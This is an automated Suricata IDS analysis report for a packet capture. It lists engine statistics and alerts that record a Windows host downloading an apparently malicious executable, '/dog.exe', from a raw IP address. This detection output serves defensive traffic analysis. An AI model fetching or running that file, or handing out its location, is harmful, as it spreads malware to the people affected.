Filename: a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 24.1711988449 seconds
Hash: 62429eda87eaf55ba4e1b45d7bcd1db9
Uploaded: 1556721318

Logfiles


packet_stats.log (14817 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6           946          4353718      352305215     200849160        190.0b   95.16
 IPv4      17            41          3312108      351248726     200011273          8.2b    4.11
 IPv6      17             8          3026195      352648762     182327419          1.5b    0.73
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6           946            69706       26629946        398532        377.0m   95.74
TMM_FLOWWORKER              IPv4      17            41           128374         673205        223871          9.2m    2.33
TMM_RECEIVEPCAPFILE         IPv4       6           945             2552          42664          3104          2.9m    0.74
TMM_RECEIVEPCAPFILE         IPv4      17            41             2560           3648          2918        119.7k    0.03
TMM_DECODEPCAPFILE          IPv4       6           945             2658          35865          2927          2.8m    0.70
TMM_DECODEPCAPFILE          IPv4      17            41             2691          11315          3170        130.0k    0.03
TMM_FLOWWORKER              IPv6      17             8           146645         317669        193488          1.5m    0.39
TMM_RECEIVEPCAPFILE         IPv6      17             8             2809          13057          4279         34.2k    0.01
TMM_DECODEPCAPFILE          IPv6      17             8             2831          41129          8257         66.1k    0.02

Flow Worker            IP ver   Proto   cnt            min            max            avg            tot           %% 
--------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
flow                    IPv4       6           945             2834          45972          3467          3.3m  0.90  
flow                    IPv4      17            41             2829          12457          4246        174.1k  0.05  
stream                  IPv4       6           946             2798         313184          7882          7.5m  2.06  
app-layer               IPv4      17            41             2536          24743          4856        199.1k  0.05  
detect                  IPv4       6           946            46653       25766675        358192        338.9m  93.52 
detect                  IPv4      17            41           111720         517716        197740          8.1m  2.24  
tcp-prune               IPv4       6           946             2558          17947          2989          2.8m  0.78  
flow                    IPv6      17             8             2918          22966          6759         54.1k  0.01  
app-layer               IPv6      17             8             2548          18465          7979         63.8k  0.02  
detect                  IPv6      17             8           115411         252279        164195          1.3m  0.36  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg            tot           %% 
--------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
http                    IPv4       6             3             4050          65206         25461         76.4k  75.04 
dns                     IPv4      17             2             6922           7912          7417         14.8k  14.57 
http                    IPv6      17             1            10571          10571         10571         10.6k  10.39 
Proto detect            IPv4      17             8             2779           8779          4842         38.7k
Proto detect            IPv6      17             4             3319          11425          6845         27.4k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
LOGGER_ALERT_FAST           IPv4       6             3            66601         224279        121700        365.1k  3.65  
LOGGER_UNIFIED2             IPv4       6             3            65680        8150318       2781120          8.3m  83.36 
LOGGER_JSON_ALERT           IPv4       6             3           101920         347675        185191        555.6k  5.55  
LOGGER_JSON_DNS             IPv4      17             2            98086         126513        112299        224.6k  2.24  
LOGGER_JSON_HTTP            IPv4       6             2           120863         181406        151134        302.3k  3.02  
LOGGER_JSON_FILE            IPv4       6             2            89832         127951        108891        217.8k  2.18  

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       6           603             2619         142013         20726        12.5m  10.99 
payload                           IPv4      17            41             3558          67398         14721       603.6k  0.53  
stream                            IPv4       6           603             2545         683923         36811        22.2m  19.51 
http_uri                          IPv4       6             2            11486          17091         14288        28.6k  0.03  
http_request_line                 IPv4       6             2             8605          13523         11064        22.1k  0.02  
http_client_body                  IPv4       6             2             3758           4686          4222         8.4k  0.01  
http_header (request)             IPv4       6             2           129379         151580        140479       281.0k  0.25  
http_header (request trailer)     IPv4       6             2             3378           3640          3509         7.0k  0.01  
http_header_names (request)       IPv4       6             2            29530          41534         35532        71.1k  0.06  
http_accept (request)             IPv4       6             2             3748           4653          4200         8.4k  0.01  
http_referer (request)            IPv4       6             2             3345           3868          3606         7.2k  0.01  
http_content_len (request)        IPv4       6             2             3434           4804          4119         8.2k  0.01  
http_content_type (request)       IPv4       6             2             3529           4914          4221         8.4k  0.01  
http_protocol (request)           IPv4       6             2             5264          32715         18989        38.0k  0.03  
http_start (request)              IPv4       6             2            17754          20318         19036        38.1k  0.03  
http_raw_header (request)         IPv4       6             2            16591          18804         17697        35.4k  0.03  
http_method                       IPv4       6             2             5883           6739          6311        12.6k  0.01  
http_cookie (request)             IPv4       6             2             3934           3941          3937         7.9k  0.01  
http_raw_uri                      IPv4       6             2             5292           6137          5714        11.4k  0.01  
http_user_agent                   IPv4       6             2            48086          54271         51178       102.4k  0.09  
http_host                         IPv4       6             2             7272           7597          7434        14.9k  0.01  
dns_query                         IPv4      17             1             8721           8721          8721         8.7k  0.01  
http_response_line                IPv4       6             2            10709          10996         10852        21.7k  0.02  
http_header (response)            IPv4       6             2            58891          61637         60264       120.5k  0.11  
http_header (response trailer)    IPv4       6             2             2638           3185          2911         5.8k  0.01  
http_content_type (response)      IPv4       6             2             6251          11011          8631        17.3k  0.02  
http_raw_header (response)        IPv4       6           595             4369          30320          4845         2.9m  2.53  
http_cookie (response)            IPv4       6             2             4128           4200          4164         8.3k  0.01  
http_stat_code                    IPv4       6             2             4402           4757          4579         9.2k  0.01  
file_data (http response)         IPv4       6           593             2573        8006341        125759        74.6m  65.55 
Total                             IPv4                  2484                                         45756       113.7m
payload                           IPv6      17             8             5933          22304         13263       106.1k  0.09  
Total                             IPv6                     8                                         13263       106.1k

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
PROF_DETECT_IPONLY          IPv4       6             4            21922          54056         39335        157.3k  0.03  
PROF_DETECT_IPONLY          IPv4      17             8            37665         105708         59763        478.1k  0.10  
PROF_DETECT_RULES           IPv4       6           946             2547       25102096        142067        134.4m  27.14 
PROF_DETECT_RULES           IPv4      17            41            52512         317591        107260          4.4m  0.89  
PROF_DETECT_STATEFUL_START    IPv4       6           502             5106       23030493         93520         46.9m  9.48  
PROF_DETECT_STATEFUL_CONT    IPv4       6           946             2619         401194         18905         17.9m  3.61  
PROF_DETECT_STATEFUL_CONT    IPv4      17            41             2584          20992          3437        140.9k  0.03  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6           938             2562          88227          3006          2.8m  0.57  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17             2             2864           3154          3009          6.0k  0.00  
PROF_DETECT_PREFILTER       IPv4       6           946             8081        8197122        150318        142.2m  28.71 
PROF_DETECT_PREFILTER       IPv4      17            41            24711          91752         38440          1.6m  0.32  
PROF_DETECT_PF_PAYLOAD      IPv4       6           603            13173         727689         66893         40.3m  8.15  
PROF_DETECT_PF_PAYLOAD      IPv4      17            41             8633          72733         20064        822.6k  0.17  
PROF_DETECT_PF_TX           IPv4       6           938             2555        8021483         90119         84.5m  17.07 
PROF_DETECT_PF_TX           IPv4      17             1            14388          14388         14388         14.4k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6           529             2543          40673          3825          2.0m  0.41  
PROF_DETECT_PF_SORT1        IPv4      17            41             2735           5061          3461        141.9k  0.03  
PROF_DETECT_PF_SORT2        IPv4       6           946             2542          23739          2984          2.8m  0.57  
PROF_DETECT_PF_SORT2        IPv4      17            41             2563           4209          2939        120.5k  0.02  
PROF_DETECT_NONMPMLIST      IPv4       6           946             2542          53194          2980          2.8m  0.57  
PROF_DETECT_NONMPMLIST      IPv4      17            41             2682           3328          2855        117.1k  0.02  
PROF_DETECT_ALERT           IPv4       6           946             2527          36515          2872          2.7m  0.55  
PROF_DETECT_ALERT           IPv4      17            41             2531           2945          2611        107.1k  0.02  
PROF_DETECT_CLEANUP         IPv4       6           946             2560         143459          3020          2.9m  0.58  
PROF_DETECT_CLEANUP         IPv4      17            41             2529           4476          2730        112.0k  0.02  
PROF_DETECT_GETSGH          IPv4       6           946             2533         456265          3389          3.2m  0.65  
PROF_DETECT_GETSGH          IPv4      17            41             2545          19354          3857        158.2k  0.03  
PROF_DETECT_IPONLY          IPv6      17             4             5996          13484          9312         37.2k  0.01  
PROF_DETECT_RULES           IPv6      17             8            42019         102698         70629        565.0k  0.11  
PROF_DETECT_STATEFUL_CONT    IPv6      17             8             2636           3162          2818         22.5k  0.00  
PROF_DETECT_PREFILTER       IPv6      17             8            28014          48504         36195        289.6k  0.06  
PROF_DETECT_PF_PAYLOAD      IPv6      17             8            11310          27791         18567        148.5k  0.03  
PROF_DETECT_PF_SORT1        IPv6      17             8             2918           4089          3285         26.3k  0.01  
PROF_DETECT_PF_SORT2        IPv6      17             8             2636           4620          3396         27.2k  0.01  
PROF_DETECT_NONMPMLIST      IPv6      17             8             2745           3429          3136         25.1k  0.01  
PROF_DETECT_ALERT           IPv6      17             8             2538           4946          2874         23.0k  0.00  
PROF_DETECT_CLEANUP         IPv6      17             8             2579           6745          3490         27.9k  0.01  
PROF_DETECT_GETSGH          IPv6      17             8             2553          54336         14675        117.4k  0.02  


suricata-4.0.0-etpro-all-perf.txt-2019-05-01-T-14-35-42-05012019.1435-a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap.txt (51157 bytes)
  --------------------------------------------------------------------------
  Date: 5/1/2019 -- 14:35:42. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2022270      1        2        20861701     17.17  1        0        20861701    20861701.00 0.00        20861701.00
  2        2016854      1        3        531532       0.44   1        0        531532      531532.00   0.00        531532.00  
  3        2018241      1        2        525534       0.43   21       0        468748      25025.43    0.00        25025.43   
  4        2801929      1        7        2398795      1.97   29       0        446362      82717.07    0.00        82717.07   
  5        2807130      1        4        2197469      1.81   127      0        399994      17302.91    0.00        17302.91   
  6        2019165      1        3        714694       0.59   21       0        399471      34033.05    0.00        34033.05   
  7        2824739      1        2        692258       0.57   21       0        396953      32964.67    0.00        32964.67   
  8        2008575      1        5        4391389      3.61   589      0        385707      7455.67     0.00        7455.67    
  9        2820158      1        2        3153799      2.60   20       0        254232      157689.95   0.00        157689.95  
  10       2820157      1        2        3213483      2.64   20       0        250830      160674.15   0.00        160674.15  
  11       2016855      1        2        191712       0.16   1        0        191712      191712.00   0.00        191712.00  
  12       2819659      1        4        813064       0.67   7        0        187150      116152.00   0.00        116152.00  
  13       2020865      1        3        898406       0.74   7        0        185799      128343.71   0.00        128343.71  
  14       2819664      1        2        4036859      3.32   27       0        182856      149513.30   0.00        149513.30  
  15       2819930      1        2        3983852      3.28   27       0        172449      147550.07   0.00        147550.07  
  16       2819933      1        2        757574       0.62   7        0        126420      108224.86   0.00        108224.86  
  17       2802991      1        5        721435       0.59   11       0        120915      65585.00    0.00        65585.00   
  18       2018496      1        9        149440       0.12   2        0        120616      74720.00    0.00        74720.00   
  19       2801930      1        7        1815956      1.49   29       0        116803      62619.17    0.00        62619.17   
  20       2018342      1        2        314525       0.26   3        0        108230      104841.67   0.00        104841.67  
  21       2827094      1        2        1091588      0.90   13       0        101693      83968.31    0.00        83968.31   
  22       2014819      1        3        94583        0.08   1        0        94583       94583.00    0.00        94583.00   
  23       2803027      1        6        1271909      1.05   19       0        91894       66942.58    0.00        66942.58   
  24       2022502      1        4        129180       0.11   2        0        89048       64590.00    0.00        64590.00   
  25       2826332      1        2        475306       0.39   7        0        84504       67900.86    0.00        67900.86   
  26       2805348      1        4        505081       0.42   10       0        81609       50508.10    0.00        50508.10   
  27       2008305      1        3        271219       0.22   72       0        80065       3766.93     0.00        3766.93    
  28       2019714      1        10       77072        0.06   1        1        77072       77072.00    77072.00    0.00       
  29       2018358      1        7        110517       0.09   2        0        74090       55258.50    0.00        55258.50   
  30       2816909      1        2        133245       0.11   2        0        73665       66622.50    0.00        66622.50   
  31       2022054      1        3        73563        0.06   1        0        73563       73563.00    0.00        73563.00   
  32       2802987      1        5        3047142      2.51   62       0        72684       49147.45    0.00        49147.45   
  33       2016141      1        5        69937        0.06   1        1        69937       69937.00    69937.00    0.00       
  34       2804927      1        2        519953       0.43   10       0        69805       51995.30    0.00        51995.30   
  35       2816910      1        2        127543       0.10   2        0        69172       63771.50    0.00        63771.50   
  36       2804907      1        3        467382       0.38   8        0        68824       58422.75    0.00        58422.75   
  37       2816940      1        2        125427       0.10   2        0        67995       62713.50    0.00        62713.50   
  38       2804911      1        3        642022       0.53   12       0        67535       53501.83    0.00        53501.83   
  39       2019822      1        7        336623       0.28   21       0        66964       16029.67    0.00        16029.67   
  40       2803657      1        5        478119       0.39   9        0        66783       53124.33    0.00        53124.33   
  41       2020569      1        1        194930       0.16   4        0        63781       48732.50    0.00        48732.50   
  42       2018982      1        2        192789       0.16   4        0        62869       48197.25    0.00        48197.25   
  43       2804906      1        3        110337       0.09   2        0        61219       55168.50    0.00        55168.50   
  44       2816666      1        4        335407       0.28   21       0        59908       15971.76    0.00        15971.76   
  45       2015744      1        4        74742        0.06   7        1        58061       10677.43    58061.00    2780.17    
  46       2013352      1        4        116548       0.10   21       0        57706       5549.90     0.00        5549.90    
  47       2805985      1        2        206209       0.17   4        0        57480       51552.25    0.00        51552.25   
  48       2018959      1        3        161742       0.13   21       1        56966       7702.00     56966.00    5238.80    
  49       2018572      1        2        326066       0.27   21       0        55227       15526.95    0.00        15526.95   
  50       2816924      1        4        80364        0.07   2        0        52445       40182.00    0.00        40182.00   
  51       2022552      1        2        781783       0.64   36       0        52343       21716.19    0.00        21716.19   
  52       2024775      1        1        182074       0.15   47       0        51067       3873.91     0.00        3873.91    
  53       2808234      1        1        182071       0.15   4        0        50319       45517.75    0.00        45517.75   
  54       2807400      1        3        180781       0.15   4        0        50166       45195.25    0.00        45195.25   
  55       2017190      1        6        49759        0.04   1        0        49759       49759.00    0.00        49759.00   
  56       2024771      1        1        3416459      2.81   595      0        49506       5741.95     0.00        5741.95    
  57       2019344      1        5        88241        0.07   2        0        49386       44120.50    0.00        44120.50   
  58       2022050      1        3        176113       0.14   4        0        49016       44028.25    0.00        44028.25   
  59       2009897      1        14       57906        0.05   4        0        47871       14476.50    0.00        14476.50   
  60       2014353      1        6        103519       0.09   21       0        47697       4929.48     0.00        4929.48    
  61       2806802      1        2        1364885      1.12   66       0        47347       20680.08    0.00        20680.08   
  62       2018375      1        3        646564       0.53   49       0        47296       13195.18    0.00        13195.18   
  63       2802880      1        3        270699       0.22   9        0        47097       30077.67    0.00        30077.67   
  64       2024778      1        1        475012       0.39   143      0        45575       3321.76     0.00        3321.76    
  65       2019345      1        2        3199960      2.63   227      0        45561       14096.74    0.00        14096.74   
  66       2022896      1        5        45115        0.04   1        0        45115       45115.00    0.00        45115.00   
  67       2009028      1        11       107562       0.09   21       0        44707       5122.00     0.00        5122.00    
  68       2024178      1        2        67129        0.06   2        0        44456       33564.50    0.00        33564.50   
  69       2008438      1        20       174587       0.14   4        0        44386       43646.75    0.00        43646.75   
  70       2826156      1        2        138640       0.11   6        0        44211       23106.67    0.00        23106.67   
  71       2822367      1        2        123823       0.10   7        0        43892       17689.00    0.00        17689.00   
  72       2017613      1        9        76242        0.06   2        0        43701       38121.00    0.00        38121.00   
  73       2022609      1        2        78391        0.06   2        0        42815       39195.50    0.00        39195.50   
  74       2021076      1        2        101946       0.08   21       1        42380       4854.57     42380.00    2978.30    
  75       2009909      1        10       52546        0.04   4        0        42367       13136.50    0.00        13136.50   
  76       2822979      1        3        42334        0.03   1        0        42334       42334.00    0.00        42334.00   
  77       2018958      1        18       64862        0.05   2        0        42281       32431.00    0.00        32431.00   
  78       2804508      1        2        42103        0.03   1        0        42103       42103.00    0.00        42103.00   
  79       2018121      1        4        42072        0.03   1        0        42072       42072.00    0.00        42072.00   
  80       2025064      1        5        82806        0.07   2        0        41876       41403.00    0.00        41403.00   
  81       2016948      1        2        505588       0.42   35       0        41462       14445.37    0.00        14445.37   
  82       2013441      1        9        49794        0.04   4        0        41000       12448.50    0.00        12448.50   
  83       2816929      1        4        69538        0.06   2        0        40858       34769.00    0.00        34769.00   
  84       2809859      1        6        72356        0.06   2        0        40790       36178.00    0.00        36178.00   
  85       2816525      1        10       74839        0.06   2        0        40405       37419.50    0.00        37419.50   
  86       2809850      1        2        40246        0.03   1        0        40246       40246.00    0.00        40246.00   
  87       2820928      1        2        620688       0.51   43       0        40204       14434.60    0.00        14434.60   
  88       2020573      1        2        40052        0.03   1        1        40052       40052.00    40052.00    0.00       
  89       2014471      1        6        39011        0.03   1        0        39011       39011.00    0.00        39011.00   
  90       2017552      1        6        4637312      3.82   334      0        38932       13884.17    0.00        13884.17   
  91       2022482      1        3        38918        0.03   1        0        38918       38918.00    0.00        38918.00   
  92       2828122      1        2        77003        0.06   2        0        38891       38501.50    0.00        38501.50   
  93       2023679      1        3        320921       0.26   21       0        38242       15281.95    0.00        15281.95   
  94       2820851      1        5        75763        0.06   2        0        38144       37881.50    0.00        37881.50   
  95       2015547      1        4        38141        0.03   1        0        38141       38141.00    0.00        38141.00   
  96       2022550      1        16       38125        0.03   1        0        38125       38125.00    0.00        38125.00   
  97       2021067      1        2        37742        0.03   1        1        37742       37742.00    37742.00    0.00       
  98       2022942      1        2        37356        0.03   1        0        37356       37356.00    0.00        37356.00   
  99       2816327      1        4        74044        0.06   2        0        37123       37022.00    0.00        37022.00   
  100      2016029      1        3        36486        0.03   1        0        36486       36486.00    0.00        36486.00   
  101      2012143      1        3        36338        0.03   1        0        36338       36338.00    0.00        36338.00   
  102      2828207      1        3        111287       0.09   6        0        36238       18547.83    0.00        18547.83   
  103      2020838      1        3        344187       0.28   21       0        36200       16389.86    0.00        16389.86   
  104      2830124      1        1        71175        0.06   2        0        36187       35587.50    0.00        35587.50   
  105      2809306      1        4        1955640      1.61   137      0        36004       14274.74    0.00        14274.74   
  106      2020826      1        7        35508        0.03   1        0        35508       35508.00    0.00        35508.00   
  107      2018403      1        10       35307        0.03   1        0        35307       35307.00    0.00        35307.00   
  108      2023625      1        3        100338       0.08   25       0        35257       4013.52     0.00        4013.52    
  109      2018452      1        15       70213        0.06   2        0        35171       35106.50    0.00        35106.50   
  110      2018421      1        2        34966        0.03   1        0        34966       34966.00    0.00        34966.00   
  111      2020941      1        2        34666        0.03   1        0        34666       34666.00    0.00        34666.00   
  112      2010140      1        7        210040       0.17   44       0        34478       4773.64     0.00        4773.64    
  113      2815326      1        2        34430        0.03   1        0        34430       34430.00    0.00        34430.00   
  114      2810481      1        4        325326       0.27   16       0        34414       20332.88    0.00        20332.88   
  115      2816356      1        2        63022        0.05   2        0        34237       31511.00    0.00        31511.00   
  116      2819857      1        1        101725       0.08   4        0        34112       25431.25    0.00        25431.25   
  117      2016578      1        5        34040        0.03   1        0        34040       34040.00    0.00        34040.00   
  118      2001330      1        8        1460338      1.20   516      0        33999       2830.11     0.00        2830.11    
  119      2016097      1        4        33744        0.03   1        0        33744       33744.00    0.00        33744.00   
  120      2001195      1        9        84538        0.07   5        0        33497       16907.60    0.00        16907.60   
  121      2023672      1        4        324562       0.27   21       0        33419       15455.33    0.00        15455.33   
  122      2816526      1        13       62015        0.05   2        0        33381       31007.50    0.00        31007.50   
  123      2022658      1        4        33172        0.03   1        0        33172       33172.00    0.00        33172.00   
  124      2819694      1        2        320266       0.26   21       0        33142       15250.76    0.00        15250.76   
  125      2809410      1        2        32



unified2.alert.1556721340 - (16682 bytes)


stats.log - (2762 bytes)
------------------------------------------------------------------------------------
Date: 5/1/2019 -- 14:35:42 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 1026
decoder.bytes                              | Total                     | 766122
decoder.ipv4                               | Total                     | 986
decoder.ipv6                               | Total                     | 8
decoder.ethernet                           | Total                     | 1026
decoder.tcp                                | Total                     | 945
decoder.udp                                | Total                     | 49
decoder.avg_pkt_size                       | Total                     | 746
decoder.max_pkt_size                       | Total                     | 1260
flow.tcp                                   | Total                     | 2
flow.udp                                   | Total                     | 11
tcp.sessions                               | Total                     | 2
tcp.syn                                    | Total                     | 2
tcp.synack                                 | Total                     | 2
tcp.rst                                    | Total                     | 2
tcp.overlap                                | Total                     | 1
detect.alert                               | Total                     | 5
detect.mpm_list                            | Total                     | 6
detect.nonmpm_list                         | Total                     | 2
detect.match_list                          | Total                     | 7
app_layer.flow.http                        | Total                     | 2
app_layer.tx.http                          | Total                     | 2
app_layer.flow.dns_udp                     | Total                     | 1
app_layer.tx.dns_udp                       | Total                     | 1
app_layer.flow.failed_udp                  | Total                     | 10
flow.spare                                 | Total                     | 10000
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 65536
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 7076608


eve.json - (6281 bytes)
{"timestamp":"2019-04-30T02:29:52.179783+0000","flow_id":509764083655729,"pcap_cnt":27,"event_type":"alert","src_ip":"192.168.100.175","src_port":49192,"dest_ip":"188.166.74.218","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2016141,"rev":5,"signature":"ET INFO Executable Download from dotted-quad Host","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2019-04-30T02:29:52.179783+0000","flow_id":509764083655729,"pcap_cnt":27,"event_type":"alert","src_ip":"192.168.100.175","src_port":49192,"dest_ip":"188.166.74.218","dest_port":80,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2019714,"rev":10,"signature":"ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2019-04-30T02:29:52.196943+0000","flow_id":509764083655729,"pcap_cnt":65,"event_type":"alert","src_ip":"188.166.74.218","src_port":80,"dest_ip":"192.168.100.175","dest_port":49192,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2018959,"rev":3,"signature":"ET POLICY PE EXE or DLL Windows file download HTTP","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2019-04-30T02:29:52.196943+0000","flow_id":509764083655729,"pcap_cnt":65,"event_type":"alert","src_ip":"188.166.74.218","src_port":80,"dest_ip":"192.168.100.175","dest_port":49192,"proto":"TCP","app_proto":"http","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021076,"rev":2,"signature":"ET INFO SUSPICIOUS Dotted Quad Host MZ Response","category":"Potentially Bad Traffic","severity":2}}
{"timestamp":"2019-04-30T02:29:52.661527+0000","flow_id":34019146209303,"pcap_cnt":205,"event_type":"dns","src_ip":"192.168.100.175","src_port":56555,"dest_ip":"192.168.100.2","dest_port":53,"proto":"UDP","dns":{"type":"query","id":21780,"rrname":"www.bing.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-04-30T02:29:52.693403+0000","flow_id":34019146209303,"pcap_cnt":206,"event_type":"dns","src_ip":"192.168.100.2","src_port":53,"dest_ip":"192.168.100.175","dest_port":56555,"proto":"UDP","dns":{"type":"answer","id":21780,"rcode":"NOERROR","rrname":"www.bing.com","rrtype":"CNAME","ttl":26,"rdata":"a-0001.a-afdentry.net.trafficmanager.net"}}
{"timestamp":"2019-04-30T02:29:52.693403+0000","flow_id":34019146209303,"pcap_cnt":206,"event_type":"dns","src_ip":"192.168.100.2","src_port":53,"dest_ip":"192.168.100.175","dest_port":56555,"proto":"UDP","dns":{"type":"answer","id":21780,"rcode":"NOERROR","rrname":"a-0001.a-afdentry.net.trafficmanager.net","rrtype":"CNAME","ttl":59,"rdata":"dual-a-0001.a-msedge.net"}}
{"timestamp":"2019-04-30T02:29:52.693403+0000","flow_id":34019146209303,"pcap_cnt":206,"event_type":"dns","src_ip":"192.168.100.2","src_port":53,"dest_ip":"192.168.100.175","dest_port":56555,"proto":"UDP","dns":{"type":"answer","id":21780,"rcode":"NOERROR","rrname":"dual-a-0001.a-msedge.net","rrtype":"A","ttl":23,"rdata":"204.79.197.200"}}
{"timestamp":"2019-04-30T02:29:52.693403+0000","flow_id":34019146209303,"pcap_cnt":206,"event_type":"dns","src_ip":"192.168.100.2","src_port":53,"dest_ip":"192.168.100.175","dest_port":56555,"proto":"UDP","dns":{"type":"answer","id":21780,"rcode":"NOERROR","rrname":"dual-a-0001.a-msedge.net","rrtype":"A","ttl":23,"rdata":"13.107.21.200"}}
{"timestamp":"2019-04-30T02:29:52.958346+0000","flow_id":844479475001531,"pcap_cnt":317,"event_type":"http","src_ip":"192.168.100.175","src_port":49202,"dest_ip":"204.79.197.200","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"www.bing.com","url":"\/favicon.ico","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"image\/x-icon"}}
{"timestamp":"2019-04-30T02:29:54.956067+0000","flow_id":509764083655729,"pcap_cnt":675,"event_type":"alert","src_ip":"188.166.74.218","src_port":80,"dest_ip":"192.168.100.175","dest_port":49192,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2015744,"rev":4,"signature":"ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)","category":"Misc activity","severity":3},"app_proto":"http"}
{"timestamp":"2019-04-30T02:29:55.287976+0000","flow_id":509764083655729,"pcap_cnt":973,"event_type":"http","src_ip":"192.168.100.175","src_port":49192,"dest_ip":"188.166.74.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"188.166.74.218","url":"\/dog.exe","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"application\/x-msdos-program"}}
{"timestamp":"2019-04-30T02:29:57.198876+0000","flow_id":509764083655729,"pcap_cnt":979,"event_type":"fileinfo","src_ip":"188.166.74.218","src_port":80,"dest_ip":"192.168.100.175","dest_port":49192,"proto":"TCP","http":{"hostname":"188.166.74.218","url":"\/dog.exe","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"application\/x-msdos-program","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":672768},"app_proto":"http","fileinfo":{"filename":"\/dog.exe","gaps":false,"state":"CLOSED","stored":false,"size":672768,"tx_id":0}}
{"timestamp":"2019-04-30T02:30:49.924510+0000","flow_id":844479475001531,"event_type":"fileinfo","src_ip":"204.79.197.200","src_port":80,"dest_ip":"192.168.100.175","dest_port":49202,"proto":"TCP","http":{"hostname":"www.bing.com","url":"\/favicon.ico","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"image\/x-icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237},"app_proto":"http","fileinfo":{"filename":"\/favicon.ico","gaps":false,"state":"CLOSED","stored":false,"size":237,"tx_id":0}}


suricata-report-2019-05-01-T-14-35-42-05012019.1435-a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap.txt - (17602 bytes)
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/62429eda87eaf55ba4e1b45d7bcd1db956b33745cb75ec8c950e11a498e082d2 -r /var/pcap/05012019.1435-a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap -vvv -k none
elapsedtime:23.225461
stderr:
stdout:
1/5/2019 -- 14:35:19 - <Info> - Configuration node 'rule-files' redefined.
1/5/2019 -- 14:35:19 - <Notice> - This is Suricata version 4.0.0 RELEASE
1/5/2019 -- 14:35:19 - <Info> - CPUs/cores online: 1
1/5/2019 -- 14:35:19 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 31943 and 'request-body-inspect-window' set to 16689 after randomization.
1/5/2019 -- 14:35:19 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32594 and 'response-body-inspect-window' set to 16252 after randomization.
1/5/2019 -- 14:35:19 - <Config> - DNS request flood protection level: 500
1/5/2019 -- 14:35:19 - <Config> - DNS per flow memcap (state-memcap): 524288
1/5/2019 -- 14:35:19 - <Config> - DNS global memcap: 16777216
1/5/2019 -- 14:35:19 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
1/5/2019 -- 14:35:19 - <Config> - preallocated 1000 hosts of size 136
